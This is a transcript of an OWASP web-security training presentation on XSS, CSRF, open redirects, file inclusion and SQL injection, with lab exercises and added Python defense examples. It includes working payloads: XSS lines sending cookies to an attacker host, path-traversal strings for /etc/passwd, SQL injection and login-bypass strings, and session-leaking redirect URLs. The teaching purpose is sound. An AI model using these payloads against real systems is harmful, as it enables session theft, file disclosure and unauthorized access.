OWASP San Diego Training Presentation
Transcript of OWASP San Diego Training Presentation
![Page 1: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/1.jpg)
`<script>alert('OWASP Training');</script>`
![Page 2: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/2.jpg)
Warning: This Presentation Is Intended For Educational Purposes Only
![Page 3: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/3.jpg)
◦ Setup
◦ Web Communication
◦ SQL Basics
◦ HTTP/HTTPS Overview
◦ Tools
◦ Other related technologies
◦ XSS
◦ CSRF
◦ URL Redirect
◦ Local File Inclusion (LFI)
◦ Remote File Inclusion (RFI)
◦ Direct Object Access
◦ SQL Injection
◦ Command Injection
◦ Javascript Server Side Injection
Topics
![Page 4: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/4.jpg)
Kali Linux
Firefox plugins
◦ Web Developer
◦ User-Agent Switcher
◦ Firebug
◦ SOA Client
Setup Check
![Page 5: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/5.jpg)
Setup https://172.17.0.42/dvwa/
Username: admin Password: *****
Exercise - DVWA Portal
![Page 6: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/6.jpg)
Basic Web Communication
![Page 7: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/7.jpg)
Client → Server
Client sends a request; the server sends back a response.
E.g. Web Browser → Web Server (Port 80)
◦ Web Server → Postgres Database to fetch data
⚫ Returns data to the Web Server to process and render to the Web Browser
Basic Web Communication
![Page 8: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/8.jpg)
Web Request
Basic Web Communication
```http
GET / HTTP/1.1
Host: api.bonfire-project.eu:444
Accept: */*
Authorization: Basic XXX
Accept-Encoding: gzip, deflate
```
The Basic credential is only the base64 of `username:password`, not encryption: anyone who can read the request can read the password, which is why Basic auth is only acceptable over HTTPS.
![Page 9: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/9.jpg)
Web Response
Basic Web Communication
```http
HTTP/1.1 200 OK
Vary: Authorization,Accept
Transfer-Encoding: chunked
Etag: "fa2ba873343ba638123b7671c8c09998"
Content-Type: application/vnd.bonfire+xml; charset=utf-8
Date: Wed, 01 Jun 2011 14:59:30 GMT
Server: thin 1.2.11 codename Bat-Shit Crazy
Allow: GET,OPTIONS,HEAD
Cache-Control: public,max-age=120
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<root xmlns="http://api.bonfire-project.eu/doc/schemas/occi" href="/">
  <version>0.8.9</version>
  <timestamp>1306940370</timestamp>
  <link rel="experiments" href="/experiments" type="application/vnd.bonfire+xml"/>
  <link rel="locations" href="/locations" type="application/vnd.bonfire+xml"/>
  <link rel="users" href="/users" type="application/vnd.bonfire+xml"/>
</root>
```
Note the Server header advertising the exact software version (thin 1.2.11): free fingerprinting for an attacker, and the kind of detail a hardened deployment strips.
![Page 10: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/10.jpg)
Example using Burpsuite (Repeater)…
DEMO - Request/Response
![Page 11: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/11.jpg)
GET POST HEAD TRACE PUT DELETE CONNECT OPTIONS
HTTP Methods
![Page 12: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/12.jpg)
1xx (Informational) 2xx (Success) 3xx (Redirect) 4xx (Client Error) 5xx (Server Error)
HTTP Response Codes
![Page 13: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/13.jpg)
http://www.victim.com/page.aspx?parameter1=test&parameter2=test#location=3
Scheme, host, path, query string (after `?`, parameters separated by `&`) and fragment (after `#`). The fragment stays in the browser and is never sent to the server, so a payload placed there reaches client-side JavaScript but never shows up in server logs.
HTTP URI/URL
![Page 14: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/14.jpg)
Database communication
The Web Server communicates with the DB to fetch data
SQL or a SQL abstraction layer (an ORM) is used. SQL = Structured Query Language
Basic Web Communication
![Page 15: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/15.jpg)
Example Relational SQL DB
![Page 16: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/16.jpg)
SELECT INSERT UPDATE DELETE
Types Of SQL Statements
![Page 17: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/17.jpg)
```sql
SELECT column_name FROM table_name WHERE column_name = 'value' ORDER BY column_name DESC

SELECT 'random string'
SELECT 'random string' FROM DUAL   -- Oracle requires a FROM clause; DUAL is its one-row dummy table

SeLeCt Price where ISBN_NO = '0201703092';   -- keywords are case-insensitive
```
String literals use single quotes (standard SQL reserves double quotes for identifiers; MySQL accepts both for strings by default). Keyword case does not matter to the database, which is why mixed-case keywords get past naive blacklist filters.
SELECT Statement
![Page 18: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/18.jpg)
Weak Passwords
Open Directories
Client Side Security
Detailed Error Messages
Insecure Configuration
![Page 19: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/19.jpg)
https://172.17.0.145/Web2/ (Client-Side Security exercise)
https://172.17.0.145/CrackGomezsPassword/
Demo…
EXERCISE – Insecure config.
![Page 20: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/20.jpg)
HTTPS Communication
![Page 21: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/21.jpg)
SSL/TLS Versions: SSLv2, SSLv3, TLS 1.0, TLS 1.1, TLS 1.2 (TLS 1.3 has since been added; SSLv2, SSLv3, TLS 1.0 and TLS 1.1 are deprecated and should be disabled)
Key Exchange Mechanisms: RSA, DH, DHE/EDH, ECDHE, … (only the ephemeral variants, DHE and ECDHE, give forward secrecy)
Authentication Mechanisms: RSA, …
Encryption Algorithms: RC4, DES, AES, IDEA, SEED, … (RC4 and DES are broken; prefer AES)
Encryption Modes: CBC, ECB, GCM, Counter (CTR), …
HTTPS Overview
![Page 22: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/22.jpg)
HTTPS = HTTP over TLS (at the time of these slides: TLSv1.0, TLSv1.2 or SSLv3)
Full handshake as drawn in RFC 5246; messages marked * are optional or situation-dependent:

```text
Client                                            Server

ClientHello                  -------->
                                              ServerHello
                                             Certificate*
                                       ServerKeyExchange*
                                      CertificateRequest*
                             <--------      ServerHelloDone
Certificate*
ClientKeyExchange
CertificateVerify*
[ChangeCipherSpec]
Finished                     -------->
                                       [ChangeCipherSpec]
                             <--------             Finished
Application Data             <------->     Application Data
```
HTTPS Overview
![Page 23: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/23.jpg)
HTTPS Overview
![Page 24: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/24.jpg)
HTTPS Overview
![Page 25: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/25.jpg)
Burpsuite
![Page 26: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/26.jpg)
Demo/Exercise
Burpsuite
![Page 27: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/27.jpg)
Web Developer Toolbar
![Page 28: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/28.jpg)
Firebug
![Page 29: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/29.jpg)
IE Developer Toolbar (F12)
![Page 30: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/30.jpg)
User Agent Switcher
![Page 31: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/31.jpg)
Download user agent xml list◦ http://techpatterns.com/forums/about304.html
User Agent Switcher
![Page 32: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/32.jpg)
SOA Client
![Page 33: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/33.jpg)
XML HTTP Request (XHR)
◦ XML HTTP header
JavaScript Object Notation (JSON)
◦ Way of representing data
◦ { "Firstname": "Jake", "lastname": "Jones" }
SOAP
◦ Look for .asmx files or WSDL endpoints (asmx?WSDL)
◦ Could be server to server or client to server
REST
◦ Parameters specified in the URL
◦ If you don't have documentation you can try to guess the REST parameters
Other HTTP Related Technologies
![Page 34: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/34.jpg)
Reflected XSS
Stored XSS
DOM Based XSS
Cross-Site Scripting (XSS)
![Page 35: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/35.jpg)
http://192.168.1.124/WackoPicko/pictures/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0
(the query parameter decodes to `<script>alert(1)</script>`)
Reflected XSS can be in POST
Reflected XSS
![Page 36: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/36.jpg)
Can be in the User-Agent header
Could be in a cookie
Used to be able to control a lot of HTTP headers from Flash
Reflected XSS
![Page 37: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/37.jpg)
HTML and/or JavaScript is stored on the server and later served to other users who visit the page
Stored XSS
![Page 38: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/38.jpg)
User input is gathered by JavaScript and written back into the page; the payload may never reach the server (for example when it sits in the URL fragment)
Try exploits with IE (or Safari mobile…)
DOM Based XSS
![Page 39: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/39.jpg)
◦ Put a canary value in the parameter: http://victim.com/id=yoyoyo
◦ Use the Web Developer toolbar to view the generated source
◦ Check where the canary lands in the source (text, attribute value, script block)
◦ Check whether HTML encoding is being used, or which characters survive: http://victim.com/id=yoyoyo<
◦ Exploit if possible
Finding XSS
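The canary procedure above, automated, as an added example that is not part of the original slides: given a response body it reports the context the canary landed in and which of `<`, `>`, `"`, `'` came back unencoded, then turns that into a go/no-go verdict. The sample responses are constructed; the canary value is the slide's `yoyoyo`.

```python
# Constructed sample responses (not from the slides): the same canary coming
# back in different HTML contexts, with and without output encoding.
CANARY = "yoyoyo"
PROBE = CANARY + "<>\"'"      # canary followed by the characters that matter for XSS

SAMPLE_RESPONSES = {
    "text_encoded": "<p>Results for yoyoyo&lt;&gt;&quot;&#x27;</p>",
    "text_raw":     "<p>Results for yoyoyo<>\"'</p>",
    "attr_partial": "<input value=\"yoyoyo&lt;&gt;\"'\">",
    "script_raw":   "<script>var q = 'yoyoyo<>\"'';</script>",
    "missing":      "<p>No results</p>",
}

# entity spellings a server might use for each probe character
ENTITIES = {
    "<": ("&lt;",),
    ">": ("&gt;",),
    '"': ("&quot;", "&#34;"),
    "'": ("&#x27;", "&#39;", "&apos;"),
}


def canary_context(body, canary=CANARY):
    """Where did the canary land: 'script', 'attribute', 'text', or None if absent."""
    idx = body.find(canary)
    if idx < 0:
        return None
    before = body[:idx].lower()
    if before.rfind("<script") > before.rfind("</script"):
        return "script"            # inside a <script> block
    if before.rfind("<") > before.rfind(">"):
        return "attribute"         # inside an unclosed tag, i.e. an attribute value
    return "text"


def surviving_chars(body, canary=CANARY, specials="<>\"'"):
    """Which probe characters came back raw (not entity-encoded) right after the canary."""
    idx = body.find(canary)
    if idx < 0:
        return set()
    pos = idx + len(canary)
    alive = set()
    for ch in specials:
        if body.startswith(ch, pos):
            alive.add(ch)
            pos += 1
            continue
        encoded = next((e for e in ENTITIES[ch] if body.startswith(e, pos)), None)
        if encoded is None:
            break                  # stripped or reordered: stop rather than misattribute
        pos += len(encoded)
    return alive


def assess(body, canary=CANARY):
    """Combine context and surviving characters into a verdict for this reflection point."""
    ctx = canary_context(body, canary)
    alive = surviving_chars(body, canary)
    if ctx == "text":
        exploitable = "<" in alive                       # can open a new tag
    elif ctx == "attribute":
        exploitable = '"' in alive or "'" in alive       # can close the attribute
    elif ctx == "script":
        exploitable = bool(alive & {"'", '"', "<"})      # break the string or the block
    else:
        exploitable = False
    return {"context": ctx, "alive": alive, "exploitable": exploitable}


if __name__ == "__main__":
    for name, body in SAMPLE_RESPONSES.items():
        print(name, assess(body))
```

In practice `body` is the response Burp shows for the request carrying `PROBE`; the verdict is only a prompt to try a real payload, since filters that strip `script` or rewrite the canary are not modelled here.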
![Page 40: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/40.jpg)
```text
<script>var+i=new+Image;+i.src="http://192.168.1.120"%2bdocument.cookie;</script>
<SCRIPT SRC=HTTP://ATTACKER.COM/AAA.JS></SCRIPT>
```
The first payload is shown URL-encoded (`+` is a space, `%2b` is the JavaScript `+`); it makes the victim's browser request the attacker's host with `document.cookie` appended. Put a `/?` after the host (`"http://192.168.1.120/?"+document.cookie`) so the cookie lands in the query string of the attacker's access log instead of being glued onto the host name. The second payload loads an attacker-hosted script.
Exploiting XSS Vulns
![Page 41: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/41.jpg)
Host XSS JavaScript files or resources on an Apache server
Or start a Python server:
◦ python -m SimpleHTTPServer (Python 2)
◦ python3 -m http.server (Python 3)
SimpleHTTPServer can be easily wrapped using the ssl library in Python; an HTTPS victim page will refuse to load an http:// script as mixed content, so host the payload over HTTPS in that case
Exploiting XSS Vulns
![Page 42: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/42.jpg)
Browser Exploitation Framework (BeEF)
Exploiting XSS Vulns
![Page 43: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/43.jpg)
HTML-encode all output
Be careful where user output is placed in the HTML: the right encoding depends on the context (text, attribute, URL, script)
◦ HTML encoding won't save you here: <html><script src=http://[user_controlled_input]></script></html> (a URL has to be validated against a scheme/host allowlist instead)
Do NOT write user input into the JavaScript section of the page
XSS Defense
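An added example (not from the slides) of what "be careful where output is placed" means in code: the same user value rendered into HTML text, an attribute, a JavaScript string and a `<script src>` URL, each with the encoding or validation that context needs. `ALLOWED_SCRIPT_HOSTS` is an assumed allowlist, and the render functions are illustrative templates rather than any framework's API.

```python
import html
import json
from urllib.parse import urlsplit

# Assumed allowlist of hosts we are willing to load scripts from (not from the slides).
ALLOWED_SCRIPT_HOSTS = {"cdn.example.com"}


def render_text(user):
    """<p>Hello, USER</p>: HTML entity encoding is the right tool here."""
    return "<p>Hello, %s</p>" % html.escape(user, quote=True)


def render_attribute(user):
    """<input value="USER">: quote the attribute and encode both quote characters."""
    return '<input value="%s">' % html.escape(user, quote=True)


def js_string_literal(user):
    """Turn user data into a JavaScript string literal that cannot end the string or the block."""
    literal = json.dumps(user)                       # escapes ", \ and control characters
    literal = literal.replace("</", "<\\/")          # "</script>" would otherwise close the block
    return literal.replace("\u2028", "\\u2028").replace("\u2029", "\\u2029")  # JS line terminators


def render_script_data(user):
    """<script>var name = USER;</script>: the slide says don't; if you must, emit a JS literal."""
    return "<script>var name = %s;</script>" % js_string_literal(user)


def encoding_changes(user):
    """True if HTML encoding would alter the value at all (it does nothing to a plain URL)."""
    return html.escape(user, quote=True) != user


def is_allowed_script_src(user):
    """<script src=USER>: encoding is useless here; validate scheme and host against an allowlist."""
    parts = urlsplit(user)
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_SCRIPT_HOSTS


def render_script_src(user):
    if not is_allowed_script_src(user):
        raise ValueError("script source %r not in allowlist" % user)
    return '<script src="%s"></script>' % html.escape(user, quote=True)
```

The `encoding_changes` check makes the slide's point concrete: `http://attacker.com/aaa.js` contains nothing that HTML encoding touches, so only the allowlist stops it from being loaded.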
![Page 44: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/44.jpg)
https://172.17.0.42/dvwa/ XSS Reflect exercise
EXERCISE - XSS
![Page 45: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/45.jpg)
Request on behalf of the attacker, sent by the victim's browser together with the victim's session cookie:
https://victim.com/change_password.asp?username=admin&password=mypassword123
If anti-CSRF tokens are not random they can be guessed or brute-forced
CSRF can be in GET or POST
Cross Site Request Forgery (CSRF)
![Page 46: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/46.jpg)
CSRF Tokens
◦ Generate random tokens (from a CSPRNG, tied to the user's session)
◦ Make sure you actually check your tokens on every state-changing request ☺
CSRF Defense
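Added example of the two points on this slide, random tokens and actually checking them; this is not code from the slides or the training apps. The token is a CSPRNG nonce bound to the session with an HMAC, it is compared in constant time, and a change-password handler modelled on the slide's `change_password.asp` refuses the forged request. `SECRET_KEY`, the session identifiers and the handler are assumed.

```python
import hashlib
import hmac
import secrets

# Server-side secret (assumed; generated at startup here, normally loaded from config).
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Random nonce + HMAC binding it to this session: unguessable and not reusable elsewhere."""
    nonce = secrets.token_hex(16)                       # CSPRNG, not time() or a counter
    mac = hmac.new(SECRET_KEY, ("%s:%s" % (session_id, nonce)).encode(),
                   hashlib.sha256).hexdigest()
    return "%s.%s" % (nonce, mac)


def verify_csrf_token(session_id, token):
    """True only for a token issued for this session; the comparison is constant-time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SECRET_KEY, ("%s:%s" % (session_id, nonce)).encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def change_password(session_id, form):
    """State-changing handler: reject before touching any state if the token fails."""
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    # ... update the password for the logged-in user here ...
    return 200, "password changed for %s" % form.get("username", "")


def forged_request(session_id):
    """What attacker.com can make the victim's browser send: the cookie rides along, the token does not."""
    return change_password(session_id, {"username": "admin", "password": "mypassword123"})
```

`SameSite` cookies and an `Origin`/`Referer` check are worthwhile extra layers, but the session-bound token checked on every state-changing request is the control the slide is asking for.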
![Page 47: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/47.jpg)
https://victim.com/login.asp?landing_page=/user.asp
https://victim.com/login.asp?landing_page=http://www.google.com
URL Redirect
![Page 48: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/48.jpg)
If you can't use http:// try https://. If you can't use http:// or https:// try //google.com (a protocol-relative URL; the browser fills in the current scheme)
URL Redirect
![Page 49: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/49.jpg)
Redirecting to other pages within the site can still be considered a vulnerability
For example, when combining the redirect with other attacks like XSS, CSRF, out-of-band SQL injection, or command injection
https://victim.com/login.aspx?page=user.aspx?param=<script>alert(1)</script>
URL Redirect
![Page 50: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/50.jpg)
URL redirects can be used to steal session information carried in the URL: the attacker's server reads it from the Referer header of the redirected request
https://victim.com/login?page=http://attacker.com
https://victim.com/login?page=http://attacker.com&jsessionId=AB21CF40A3BD698
URL Redirect
![Page 51: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/51.jpg)
Store the location(s) to redirect to on the server and pass only a key
Create a whitelist of possible URLs to redirect to
URL Redirect
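Added example, not from the slides, contrasting the naive "starts with http://" check, which the `https://` and `//google.com` tricks above walk past, with the two defenses on this slide: a server-side table of destinations keyed by name, and, where a path must be accepted, a validator that only lets an absolute local path through. `SITE_PAGES` is an assumed table.

```python
from urllib.parse import urlsplit

# Assumed server-side table: clients send a key, never a URL.
SITE_PAGES = {
    "user": "/user.asp",
    "help": "https://help.victim.com/start",
}


def naive_is_local(target):
    """The check many apps ship: it only blocks an explicit http://, so https: and //host slip through."""
    return not target.lower().startswith("http://")


def safe_local_path(target, default="/"):
    """Accept only an absolute path on this site; anything else falls back to the default page."""
    if not target or any(c in target for c in "\\\r\n\t\x00"):
        return default                        # browsers normalise backslashes and strip controls
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return default                        # http://..., https:..., javascript:, //host
    if not target.startswith("/") or target.startswith("//"):
        return default                        # relative paths and protocol-relative URLs
    return target


def redirect_target(key, default="/"):
    """Preferred: look the destination up on the server, so the client never supplies a URL."""
    return SITE_PAGES.get(key, default)
```

Even a path that passes `safe_local_path` can still carry the chained XSS or CSRF payload from the earlier slide (`page=user.aspx?param=<script>...`), which is the argument for the key lookup over path validation.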
![Page 52: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/52.jpg)
PHP functions
◦ include()
◦ include_once()
◦ require()
◦ require_once()
◦ fopen()
Local File Inclusion
![Page 53: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/53.jpg)
```text
../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\boot.ini
.././.././.././.././.././../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
Local File Inclusion
![Page 54: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/54.jpg)
Typically Java and .NET LFI vulns will not allow access outside of the web root folder
Instead of starting with ../../../../../../../../../../../etc/passwd, first try ../index.jsp or ../../scripta.js to prove the traversal inside the web root
Local File Inclusion
![Page 55: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/55.jpg)
Harden php.ini and other configuration files (e.g. open_basedir, allow_url_fopen and allow_url_include off)
Make sure web directories are not writable
Don't trust user input for file operations
LFI Defense
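Added example (not from the slides) applying "don't trust user input for file operations" to the traversal strings listed two slides up: decode, normalise and confine the requested path under the document root, or better, map a page name to a file so user input never becomes a path. `WEB_ROOT` and `PAGES` are assumed.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"                              # assumed document root
PAGES = {"home": "home.php", "about": "about.php"}      # assumed allowlist for include()


def decode_fully(value, rounds=3):
    """Undo repeated URL encoding (%2e%2e%2f, %252e...) the way a lax server stack would."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under_root(user_path, root=WEB_ROOT):
    """Return the file to open if it stays under root, else None (traversal attempt)."""
    decoded = decode_fully(user_path).replace("\\", "/")
    if "\x00" in decoded:
        return None                       # null byte: historic PHP trick to drop an appended ".php"
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    root = posixpath.normpath(root)
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def include_page(name, root=WEB_ROOT):
    """Preferred fix: a key selects a file on the server; the request never carries a path."""
    filename = PAGES.get(name)
    return None if filename is None else posixpath.join(root, filename)
```

`posixpath` is used so the result is the same on every platform; in a real deployment resolve symlinks too (`os.path.realpath`) before comparing against the root, since a symlink inside the web root can point anywhere.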
![Page 56: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/56.jpg)
https://172.17.0.42/dvwa/ File Inclusion exercise
EXERCISE - LFI
![Page 57: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/57.jpg)
php.ini settings that make remote inclusion possible:

```ini
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On
```
allow_url_include is Off by default and is the one that turns an include() of user input into remote code execution; set both to Off unless something genuinely needs them.
Remote File Inclusion
![Page 58: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/58.jpg)
Go straight to the file
Directory listing helps a lot
Can use Burp Intruder to iterate object identifiers
Check robots.txt
DirBuster
Burp engagement tools
Direct Object Access
![Page 59: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/59.jpg)
SQL is a standard query language implemented, each with its own dialect, by several vendors:
MySQL, MSSQL, Oracle, Postgres, DB2
SQL Injection
![Page 60: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/60.jpg)
Error
Union
Blind
Bypass (e.g. Authentication Bypass)
Types Of SQL Injection
![Page 61: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/61.jpg)
```text
'
"
')
)))))))))
;
\'
\"
--
' or 1=1 --
' and 1=2 --
%27
%2527
%22
#
/**/
' waitfor delay '0:0:20'--
'+waitfor+delay+'0:0:20'+--
' (select sleep(20)) --
' (select pg_sleep(20))--
'/**/(select/**/sleep(20))/**/--%20
or 1=(select benchmark(1000000,MD5('A')))--
convert(varchar,0x7b5d)
chr(0xbf).chr(0x27)
```
Triggering SQL Injection
![Page 62: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/62.jpg)
Places to try when trying to trigger a SQL injection:
◦ GET parameters
◦ POST parameters
◦ HEAD requests (blind injection only: no response body comes back)
◦ Cookies
◦ Referer header
◦ User-Agent header
◦ SOAP parameters
◦ JSON parameters
Use Burp to defeat client-side (JavaScript) SQL injection protections; they run in the attacker's browser and prove nothing
Triggering SQL Injection
![Page 63: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/63.jpg)
```sql
admin' or 1=1 --
admin' or '1'='1
admin'/**/or/**/2/**/LiKe/**/2--/**/

SELECT username, password FROM users WHERE username = 'admin' AND password = 'admin';

SELECT username, password FROM users WHERE username = 'admin' or 1=1 -- ' AND password = 'admin'
```
Everything after `--` is a comment, so the password check disappears and `1=1` makes the WHERE clause true for every row; the application logs in whichever user comes back first.
SQL Injection Authentication Bypass
![Page 64: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/64.jpg)
https://172.17.0.42/owaspbricks/login-1/ exercise
EXERCISE – SQL Injection Auth. Bypass
![Page 65: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/65.jpg)
https://172.17.0.42/owaspbricks/login-2/ exercise
EXERCISE – SQL Injection Auth. Bypass
